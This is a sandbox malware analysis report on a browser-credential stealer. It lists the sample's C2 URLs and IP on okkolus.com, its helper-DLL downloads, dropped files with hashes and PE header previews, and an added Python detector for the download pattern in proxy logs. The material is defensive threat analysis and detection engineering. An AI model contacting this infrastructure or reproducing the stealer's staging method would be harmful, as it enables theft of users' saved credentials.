https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | [D], JEHIJDGI.0.dr | false | - | high
http://okkolus.com/dfaf16606234b71d/softokn3.dller | [C] | false | Virustotal 1%; Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/nss3.dlle | [C] | false | Virustotal 5%; Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/ra | [C] | false | Avira URL Cloud: safe | unknown
http://www.sqlite.org/copyright.html. | [F], [G] | false | - | high
http://okkolus.com/dfaf16606234b71d/msvcp140.dller | [C] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/cf5cbdf706840b3f.phpN | [B] | false | Virustotal 4%; Avira URL Cloud: safe | unknown
http://www.mozilla.com/en-US/blocklist/ | mozglue[1].dll.0.dr, mozglue.dll.0.dr | false | - | high
http://okkolus.com/dfaf16606234b71d/ | [C] | false | Virustotal 1%; Avira URL Cloud: safe | unknown
https://mozilla.org0/ | freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, freebl3.dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | false | URL Reputation: safe | unknown
http://okkolus.com/cf5cbdf706840b3f.phpte3.dll | [H] | false | Virustotal 4%; Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/softokn3.dll. | [A] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/softokn3.dllCSF | [A] | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | JEHIJDGI.0.dr | false | - | high
http://okkolus.com/dfaf16606234b71d/nss3.dllll_TH | [D] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/freebl3.dll94eaf2a9d1d275a40e443fa5tionComponent | [C] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/oTab | [C] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/mozglue.dllser | [C] | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | [D], JEHIJDGI.0.dr | false | - | high
http://okkolus.com/dfaf16606234b71d/soft | [C] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/cf5cbdf706840b3f.php6c3c10c894eaf2a9d1d275a40e443fa5cations | [C] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/vcruntime140.dll% | [D] | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | JEHIJDGI.0.dr | false | - | high
http://okkolus.com/dfaf16606234b71d/nss3.dll9M | [D] | false | Avira URL Cloud: safe | unknown
http://okkolus.comppData | [C] | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | JEHIJDGI.0.dr | false | - | high
https://ac.ecopnacl | [D] | false | URL Reputation: safe | unknown
http://okkolus.com/cf5cbdf706840b3f.php/M | [D] | false | Avira URL Cloud: malware | unknown
http://okkolus.com/cf5cbdf706840b3f.phpt | [C] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/nss3.dllJT | [D] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/nss3.dlloU | [D] | false | Avira URL Cloud: safe | unknown
https://ac.ecop | [D] | false | URL Reputation: safe | unknown
http://okkolus.com/dfaf16606234b71d/mozglue.dlld | [A] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/nss3.dllllx | [A] | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | JEHIJDGI.0.dr | false | - | high
Contacted IPs:

IP | Domain | Country | ASN | ASN Name | Malicious
31.41.44.147 | okkolus.com | Russian Federation | 56577 | ASRELINKRU | true
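The contacted-URL and IP tables above show the pattern worth alerting on rather than the indicators themselves: the sample pulls the Firefox NSS libraries (nss3.dll, freebl3.dll, mozglue.dll, softokn3.dll), sqlite3.dll and the Visual C++ runtime (msvcp140.dll, vcruntime140.dll) over plain HTTP from one directory on okkolus.com, drops them into C:\ProgramData, and talks to a .php gate on the same host. Browsers keep credentials and history in SQLite databases and Firefox protects its logins with NSS, which is why this same helper set is fetched by several stealer families and not only by this sample. The following is an added example and not Joe Sandbox output or code from the sample: a Python detector that runs over a constructed proxy-log format and flags any client that fetches three or more of these DLL names from a non-allow-listed host within five minutes, recording POSTs to that host in the same window as the likely C2 gate. The log line format, the allow-list, the window and the threshold are assumptions; the URLs in the sample log are the ones from this report, the other hosts and client addresses are made up.

```python
"""Detect the stealer helper-DLL download pattern in proxy logs.

Added example. Constructed log format: "<ISO-8601 time> <client-ip> <METHOD> <url> <status>".
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# The browser-credential helper set this sample pulled into C:\ProgramData.
HELPER_DLLS = frozenset({
    "nss3.dll", "freebl3.dll", "mozglue.dll", "softokn3.dll",
    "sqlite3.dll", "msvcp140.dll", "vcruntime140.dll",
})
# Assumption: hosts from which these files may legitimately be fetched in this environment.
ALLOWED_HOSTS = frozenset({"download.mozilla.org", "aka.ms"})
WINDOW = timedelta(minutes=5)   # assumption: clustering window
MIN_DISTINCT = 3                # assumption: distinct helper DLLs needed to alert

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)

# Constructed sample log: one infected client, one legitimate Firefox fetch, one
# unrelated installer pulling two runtime DLLs far apart in time.
SAMPLE_LOG = """\
2024-05-06T02:52:10Z 10.0.0.23 POST http://okkolus.com/cf5cbdf706840b3f.php 200
2024-05-06T02:52:11Z 10.0.0.23 GET http://okkolus.com/dfaf16606234b71d/sqlite3.dll 200
2024-05-06T02:52:12Z 10.0.0.23 GET http://okkolus.com/dfaf16606234b71d/freebl3.dll 200
2024-05-06T02:52:12Z 10.0.0.23 GET http://okkolus.com/dfaf16606234b71d/mozglue.dll 200
2024-05-06T02:52:13Z 10.0.0.23 GET http://okkolus.com/dfaf16606234b71d/msvcp140.dll 200
2024-05-06T02:52:13Z 10.0.0.23 GET http://okkolus.com/dfaf16606234b71d/nss3.dll 200
2024-05-06T02:52:14Z 10.0.0.23 GET http://okkolus.com/dfaf16606234b71d/softokn3.dll 200
2024-05-06T02:52:14Z 10.0.0.23 GET http://okkolus.com/dfaf16606234b71d/vcruntime140.dll 200
2024-05-06T02:53:00Z 10.0.0.41 GET https://download.mozilla.org/firefox/nss3.dll 200
2024-05-06T02:53:05Z 10.0.0.41 GET https://download.mozilla.org/firefox/mozglue.dll 200
2024-05-06T02:53:07Z 10.0.0.41 GET https://download.mozilla.org/firefox/softokn3.dll 200
2024-05-06T02:55:00Z 10.0.0.77 GET http://cdn.example.net/installer/vcruntime140.dll 200
2024-05-06T03:40:00Z 10.0.0.77 GET http://cdn.example.net/installer/msvcp140.dll 200
"""


def parse_line(line):
    """Parse one log line into a dict with host and lower-cased file name, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
    parts = urlsplit(ev["url"])
    ev["host"] = parts.hostname or ""
    ev["file"] = parts.path.rsplit("/", 1)[-1].lower()
    return ev


def detect(lines):
    """Return one finding per (client, host) pair that fetched >= MIN_DISTINCT helper
    DLLs from a non-allow-listed host within WINDOW. Any POST from the same client
    to that host within WINDOW of the first fetch is recorded as a candidate gate."""
    by_pair = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["host"] and ev["host"] not in ALLOWED_HOSTS:
            by_pair[(ev["client"], ev["host"])].append(ev)

    findings = []
    for (client, host), events in by_pair.items():
        events.sort(key=lambda e: e["ts"])
        fetches = [e for e in events if e["method"] == "GET" and e["file"] in HELPER_DLLS]
        for i, first in enumerate(fetches):
            cluster = [e for e in fetches[i:] if e["ts"] - first["ts"] <= WINDOW]
            dlls = sorted({e["file"] for e in cluster})
            if len(dlls) >= MIN_DISTINCT:
                gates = sorted({e["url"] for e in events
                                if e["method"] == "POST" and abs(e["ts"] - first["ts"]) <= WINDOW})
                findings.append({"client": client, "host": host, "dlls": dlls,
                                 "gates": gates, "first_seen": first["ts"].isoformat()})
                break  # one finding per client/host pair is enough
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG.splitlines()):
        print(f"{f['client']} pulled {len(f['dlls'])} helper DLLs from {f['host']} "
              f"at {f['first_seen']}; gate candidates: {f['gates'] or 'none'}")
```

Tune ALLOWED_HOSTS to wherever these files legitimately come from in your environment (Firefox updates, vendor installers); the rule keys on the file names and the fetch burst rather than on okkolus.com or the dfaf16606234b71d path, because those rotate per campaign while the helper set does not.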
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1436574
Start date and time: 2024-05-06 02:51:03 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 8s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: FFAk2gixx5.exe (renamed because the original name is a hash value)
Original Sample Name: 14cd6d9cbad80b0e4076212bf7ad937f.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/18@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• HTTP Packets have been reduced
• TCP Packets have been reduced to 100
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
                                            No simulations
                                            No context
Process: C:\Users\user\Desktop\FFAk2gixx5.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.8553638852307782
Encrypted: false
SSDEEP: 48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5: 28222628A3465C5F0D4B28F70F97F482
SHA1: 1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256: 93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512: C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious: false
Reputation: high, very likely benign file
Process: C:\Users\user\Desktop\FFAk2gixx5.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1239949490932863
Encrypted: false
SSDEEP: 384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5: 271D5F995996735B01672CF227C81C17
SHA1: 7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256: 9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512: 62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\FFAk2gixx5.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6732424250451717
Encrypted: false
SSDEEP: 24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5: CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1: 3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256: EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512: 0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious: false
Reputation: high, very likely benign file
Process: C:\Users\user\Desktop\FFAk2gixx5.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.8508558324143882
Encrypted: false
SSDEEP: 24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5: 933D6D14518371B212F36C3835794D75
SHA1: 92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256: 55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512: EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\FFAk2gixx5.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 51200
Entropy (8bit): 0.8745947603342119
Encrypted: false
SSDEEP: 96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5: 378391FDB591852E472D99DC4BF837DA
SHA1: 10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256: 513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512: F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\FFAk2gixx5.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 106496
Entropy (8bit): 1.136471148832945
Encrypted: false
SSDEEP: 192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5: 37B1FC046E4B29468721F797A2BB968D
SHA1: 50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256: 7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512: 1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\FFAk2gixx5.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 685392
Entropy (8bit): 6.872871740790978
Encrypted: false
SSDEEP: 12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5: 550686C0EE48C386DFCB40199BD076AC
SHA1: EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256: EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512: 0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process: C:\Users\user\Desktop\FFAk2gixx5.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 608080
Entropy (8bit): 6.833616094889818
Encrypted: false
SSDEEP: 12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5: C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1: 95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256: BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512: FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process: C:\Users\user\Desktop\FFAk2gixx5.exe
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 450024
Entropy (8bit): 6.673992339875127
Encrypted: false
SSDEEP: 12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5: 5FF1FCA37C466D6723EC67BE93B51442
SHA1: 34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256: 5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512: 4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process: C:\Users\user\Desktop\FFAk2gixx5.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1815519
Entropy (8bit): 6.634812314798213
Encrypted: false
SSDEEP: 49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzo:J7Tf8J1Q+q
MD5: 7D191EE364B1851D2E42F34E609B9C20
SHA1: 8D2396AF483E19522D500984908F854D61A04A44
SHA-256: 724F186341F020B14781246C5CEB26962C18D322F4C96439EFA7BBE28D151DE7
SHA-512: A1BC8DCDB1E64C000134440B122B898549B46C1F2E928C4DCC073AC3E04FD7B3D9375A7A87E900238749BFABDC17E1E4C7CF6644F1F37853D3696CB04C9ED78E
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process: C:\Users\user\Desktop\FFAk2gixx5.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 257872
Entropy (8bit): 6.727482641240852
Encrypted: false
SSDEEP: 6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5: 4E52D739C324DB8225BD9AB2695F262F
SHA1: 71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256: 74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512: 2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process: C:\Users\user\Desktop\FFAk2gixx5.exe
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 55296
Entropy (8bit): 6.558106649929844
Encrypted: false
SSDEEP: 768:lK+3U7KL+LAPRycNr1gyIjFxv5ePM5et/jw1UgS05/w7uxgczc74BuRJNd6NRJ3M:lw2886xv555et/MCsjw0BuRK3jteoe
MD5: ABE1198FEA554BA7456D12709E9C788D
SHA1: 1DE434DCFA780C88A75EC3502A9CE6363D05943B
SHA-256: 1776DF92E6C198A7360F1EB13ECAD1630DFA0655CB9E52C086EFB9503277C9F6
SHA-512: 1A531FA1CD3EDD1C78B8655A2E2FA9A183E2196141F56ED2C398C1FD6E1BDF39DD572AEEFD9FD211158A32311F7B0484085A7DEA5FB749895D00C08EA20BA9D6
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 5%
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1815519
                                            Entropy (8bit):6.634812314798213
                                            Encrypted:false
                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzo:J7Tf8J1Q+q
                                            MD5:7D191EE364B1851D2E42F34E609B9C20
                                            SHA1:8D2396AF483E19522D500984908F854D61A04A44
                                            SHA-256:724F186341F020B14781246C5CEB26962C18D322F4C96439EFA7BBE28D151DE7
                                            SHA-512:A1BC8DCDB1E64C000134440B122B898549B46C1F2E928C4DCC073AC3E04FD7B3D9375A7A87E900238749BFABDC17E1E4C7CF6644F1F37853D3696CB04C9ED78E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):257872
                                            Entropy (8bit):6.727482641240852
                                            Encrypted:false
                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\FFAk2gixx5.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):55296
                                            Entropy (8bit):6.558106649929844
                                            Encrypted:false
                                            SSDEEP:768:lK+3U7KL+LAPRycNr1gyIjFxv5ePM5et/jw1UgS05/w7uxgczc74BuRJNd6NRJ3M:lw2886xv555et/MCsjw0BuRK3jteoe
                                            MD5:ABE1198FEA554BA7456D12709E9C788D
                                            SHA1:1DE434DCFA780C88A75EC3502A9CE6363D05943B
                                            SHA-256:1776DF92E6C198A7360F1EB13ECAD1630DFA0655CB9E52C086EFB9503277C9F6
                                            SHA-512:1A531FA1CD3EDD1C78B8655A2E2FA9A183E2196141F56ED2C398C1FD6E1BDF39DD572AEEFD9FD211158A32311F7B0484085A7DEA5FB749895D00C08EA20BA9D6
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 5%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):5.920409946909827
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:FFAk2gixx5.exe
                                            File size:296'960 bytes
                                            MD5:14cd6d9cbad80b0e4076212bf7ad937f
                                            SHA1:6f553fad2fd973d52dec55582490eb8c3a35b6e1
                                            SHA256:1738d5ec9cf4a62d3bebdb8690d208dc4e9bb957ba427233920a2195b04bb52e
                                            SHA512:ca8e1d03dec6ec41eba8b169ef3ce70a1f0acde0c0a9592d99f0d0013577647826a1711ef923b19bb00abc0a87cca240a042f3a237cec13ded5793519d7d56cf
                                            SSDEEP:3072:89dR4sFy2KJnd64kX/qCdx7Hto4r7uYl4HN+5BOlmXvg1T/dO:89dR4I58ndnkXiCpTeYl4HNyO8XYt/w
                                            TLSH:9F549E002590E823DF964771591DCEE0662FBC618BF4929E7214379F29B31A2712EB7F
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x2...a...a...a...a...a...a...a...a...a.dma...a...a...a...a...a...a...a...a...aRich...a........PE..L...320d...................
                                            Icon Hash:1321252d29170f17
                                            Entrypoint:0x401604
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                            Time Stamp:0x64303233 [Fri Apr 7 15:09:39 2023 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:be37cfa8808e82b62b6ce7f603a1d7f3
                                            Instruction
                                            call 00007FD2917FD7C8h
                                            jmp 00007FD2917F9D2Dh
                                            int3
                                            int3
                                            mov ecx, dword ptr [esp+04h]
                                            test ecx, 00000003h
                                            je 00007FD2917F9ED6h
                                            mov al, byte ptr [ecx]
                                            add ecx, 01h
                                            test al, al
                                            je 00007FD2917F9F00h
                                            test ecx, 00000003h
                                            jne 00007FD2917F9EA1h
                                            add eax, 00000000h
                                            lea esp, dword ptr [esp+00000000h]
                                            lea esp, dword ptr [esp+00000000h]
                                            mov eax, dword ptr [ecx]
                                            mov edx, 7EFEFEFFh
                                            add edx, eax
                                            xor eax, FFFFFFFFh
                                            xor eax, edx
                                            add ecx, 04h
                                            test eax, 81010100h
                                            je 00007FD2917F9E9Ah
                                            mov eax, dword ptr [ecx-04h]
                                            test al, al
                                            je 00007FD2917F9EE4h
                                            test ah, ah
                                            je 00007FD2917F9ED6h
                                            test eax, 00FF0000h
                                            je 00007FD2917F9EC5h
                                            test eax, FF000000h
                                            je 00007FD2917F9EB4h
                                            jmp 00007FD2917F9E7Fh
                                            lea eax, dword ptr [ecx-01h]
                                            mov ecx, dword ptr [esp+04h]
                                            sub eax, ecx
                                            ret
                                            lea eax, dword ptr [ecx-02h]
                                            mov ecx, dword ptr [esp+04h]
                                            sub eax, ecx
                                            ret
                                            lea eax, dword ptr [ecx-03h]
                                            mov ecx, dword ptr [esp+04h]
                                            sub eax, ecx
                                            ret
                                            lea eax, dword ptr [ecx-04h]
                                            mov ecx, dword ptr [esp+04h]
                                            sub eax, ecx
                                            ret
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 20h
                                            mov eax, dword ptr [ebp+08h]
                                            push esi
                                            push edi
                                            push 00000008h
                                            pop ecx
                                            mov esi, 0040C204h
                                            lea edi, dword ptr [ebp-20h]
                                            rep movsd
                                            mov dword ptr [ebp-08h], eax
                                            mov eax, dword ptr [ebp+0Ch]
                                            pop edi
                                            mov dword ptr [ebp-04h], eax
                                            pop esi
                                            test eax, eax
                                            je 00007FD2917F9EBEh
                                            test byte ptr [eax], 00000008h
                                            je 00007FD2917F9EB9h
                                            mov dword ptr [ebp-0Ch], 00000000h
                                            Programming Language:
                                            • [ASM] VS2008 build 21022
                                            • [ C ] VS2008 build 21022
                                            • [C++] VS2008 build 21022
                                            • [IMP] VS2005 build 50727
                                            • [RES] VS2008 build 21022
                                            • [LNK] VS2008 build 21022
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x2efcc         | 0x3c         | .rdata
